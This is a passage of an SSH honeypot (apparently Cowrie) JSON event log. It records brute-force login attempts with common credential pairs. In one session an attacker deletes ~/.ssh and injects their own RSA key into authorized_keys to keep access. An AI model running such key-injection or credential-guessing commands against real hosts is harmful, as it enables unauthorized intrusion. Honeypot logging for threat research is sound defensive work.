03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:10.912051Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:39:11.749119Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:39:12.228254Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:39:12.229224Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:39:12.230488Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:12.430243Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:39:12.851921Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:39:12.852857Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:39:13.052706Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:13.053879Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":46294,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d54c59e6d7","protocol":"ssh","message":"New connection: 152.32.129.236:46294 (1.2.3.4:22) [session: 66d54c59e6d7]","sensor":"my-vps","timestamp":"2025-09-09T00:39:13.370517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:13.371192Z","src_ip":"152.32.129.236","session":"66d54c59e6d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:13.632433Z","src_ip":"152.32.129.236","session":"66d54c59e6d7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:39:14.719434Z","src_ip":"152.32.129.236","session":"66d54c59e6d7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:15.985700Z","src_ip":"152.32.129.236","session":"66d54c59e6d7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":46310,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f3c988cba13","protocol":"ssh","message":"New connection: 152.32.129.236:46310 (1.2.3.4:22) [session: 8f3c988cba13]","sensor":"my-vps","timestamp":"2025-09-09T00:39:16.243263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:16.244287Z","src_ip":"152.32.129.236","session":"8f3c988cba13"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:16.502218Z","src_ip":"152.32.129.236","session":"8f3c988cba13"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:39:18.232728Z","src_ip":"152.32.129.236","session":"8f3c988cba13"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:18.434766Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:18.492033Z","src_ip":"152.32.129.236","session":"8f3c988cba13"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":51782,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb28b58f9df9","protocol":"ssh","message":"New connection: 43.156.132.147:51782 (1.2.3.4:22) [session: eb28b58f9df9]","sensor":"my-vps","timestamp":"2025-09-09T00:39:20.684830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:20.685498Z","src_ip":"43.156.132.147","session":"eb28b58f9df9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:20.934221Z","src_ip":"43.156.132.147","session":"eb28b58f9df9"}
{"eventid":"cowrie.session.closed","duration":31.25018000602722,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:21.169913Z","src_ip":"212.227.235.229","session":"ac63a3fa536d"}
{"eventid":"cowrie.login.failed","username":"redis","password":"Password","message":"login attempt [redis/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T00:39:21.968592Z","src_ip":"43.156.132.147","session":"eb28b58f9df9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:23.219669Z","src_ip":"43.156.132.147","session":"eb28b58f9df9"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":34521,"dst_ip":"1.2.3.4","dst_port":22,"session":"87fc725ec523","protocol":"ssh","message":"New connection: 103.100.209.195:34521 (1.2.3.4:22) [session: 87fc725ec523]","sensor":"my-vps","timestamp":"2025-09-09T00:39:41.020052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:41.024078Z","src_ip":"103.100.209.195","session":"87fc725ec523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:41.224349Z","src_ip":"103.100.209.195","session":"87fc725ec523"}
{"eventid":"cowrie.login.failed","username":"master","password":"pass","message":"login attempt [master/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:39:42.040240Z","src_ip":"103.100.209.195","session":"87fc725ec523"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:43.245459Z","src_ip":"103.100.209.195","session":"87fc725ec523"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":49136,"dst_ip":"1.2.3.4","dst_port":22,"session":"99896bdb94a2","protocol":"ssh","message":"New connection: 51.250.72.176:49136 (1.2.3.4:22) [session: 99896bdb94a2]","sensor":"my-vps","timestamp":"2025-09-09T00:39:55.704236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:55.704893Z","src_ip":"51.250.72.176","session":"99896bdb94a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:55.745094Z","src_ip":"51.250.72.176","session":"99896bdb94a2"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"abc123","message":"login attempt [localhost/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:39:55.940322Z","src_ip":"51.250.72.176","session":"99896bdb94a2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:56.981788Z","src_ip":"51.250.72.176","session":"99896bdb94a2"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":53384,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbf3a305d521","protocol":"ssh","message":"New connection: 5.202.105.236:53384 (1.2.3.4:22) [session: cbf3a305d521]","sensor":"my-vps","timestamp":"2025-09-09T00:39:58.543907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:58.565578Z","src_ip":"5.202.105.236","session":"cbf3a305d521"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:39:58.717873Z","src_ip":"5.202.105.236","session":"cbf3a305d521"}
{"eventid":"cowrie.login.failed","username":"black","password":"qwerty","message":"login attempt [black/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:39:59.357216Z","src_ip":"5.202.105.236","session":"cbf3a305d521"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:00.497244Z","src_ip":"5.202.105.236","session":"cbf3a305d521"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":55910,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff77250eec0f","protocol":"ssh","message":"New connection: 43.156.132.147:55910 (1.2.3.4:22) [session: ff77250eec0f]","sensor":"my-vps","timestamp":"2025-09-09T00:40:34.484434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:40:34.485429Z","src_ip":"43.156.132.147","session":"ff77250eec0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:40:34.729516Z","src_ip":"43.156.132.147","session":"ff77250eec0f"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"abc123","message":"login attempt [localhost/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:40:35.708337Z","src_ip":"43.156.132.147","session":"ff77250eec0f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:36.956146Z","src_ip":"43.156.132.147","session":"ff77250eec0f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":48288,"dst_ip":"1.2.3.4","dst_port":22,"session":"3573b5b61aab","protocol":"ssh","message":"New connection: 152.32.129.236:48288 (1.2.3.4:22) [session: 3573b5b61aab]","sensor":"my-vps","timestamp":"2025-09-09T00:40:38.397164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:40:38.398279Z","src_ip":"152.32.129.236","session":"3573b5b61aab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:40:39.379612Z","src_ip":"152.32.129.236","session":"3573b5b61aab"}
{"eventid":"cowrie.login.failed","username":"factory","password":"!","message":"login attempt [factory/!] failed","sensor":"my-vps","timestamp":"2025-09-09T00:40:40.435709Z","src_ip":"152.32.129.236","session":"3573b5b61aab"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:41.691238Z","src_ip":"152.32.129.236","session":"3573b5b61aab"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":47474,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ff349a08696","protocol":"ssh","message":"New connection: 103.100.209.195:47474 (1.2.3.4:22) [session: 4ff349a08696]","sensor":"my-vps","timestamp":"2025-09-09T00:40:51.054923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:40:51.062141Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"